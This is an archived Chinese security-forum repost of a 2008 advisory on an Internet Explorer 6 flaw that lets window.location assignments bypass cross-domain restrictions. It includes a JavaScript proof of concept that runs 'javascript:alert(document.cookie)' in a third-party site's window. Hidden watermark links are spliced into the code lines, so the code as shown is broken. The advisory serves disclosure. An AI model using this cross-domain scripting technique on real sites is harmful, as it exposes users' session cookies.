【3.A.S.T】网络安全爱好者's Archiver

黑客学习

不属于 发表于 2009-10-29 14:44

【业界】Microsoft IE location及location.href绕过跨域安全限制漏洞

Microsoft IE location及location.href绕过跨域安全限制漏洞
更新时间:2008-7-2 0:04:33责任编辑:阿loosen

热 点:

发布日期:2008-06-26
更新日期:2008-06-27

受影响系统:

Microsoft Internet Explorer 6.0
- Microsoft Windows XP SP2

描述:BUGTRAQ ID: 29960

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE没有正确地处理窗口对象的location或location.href属性,如果用户受骗访问了恶意站点的话,就会绕过跨域安全限制,在用户浏览器会话中执行任意指令。 [url=http://www.3ast.com.cn][color=#FFFFFF]黑客[/color][/url]

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。 [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]

<*来源:rayh4c (http://www.astcn.net/mailto:rayh4c@80sec.com]rayh4c@80sec.com) [size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]

链接:http://secunia.com/advisories/30857/]http://secunia.com/advisories/30857/ [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
http://blogs.zdnet.com/security/?p=1348
http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
http://www.kb.cert.org/vuls/id/923508
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<a href="">IE6 Cross Domain Scripting</a>
<script>
function win(){
x=window.open(’http://www.phpwind.net]http://www.phpwind.net&#39;); [url=http://www.3ast.com.cn][color=#FFFFFF]网络安全[/color][/url]
setTimeout(function(){
x.location=new String("javascript:alert(document.cookie)") [size=1][color=white]信息来自:[/color][/size][url=http://www.3ast.com.cn/][size=1][color=white]http://www.3ast.com.cn[/color][/size][/url]
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links.href="javascript:win()"
}
}
</script>

建议:厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.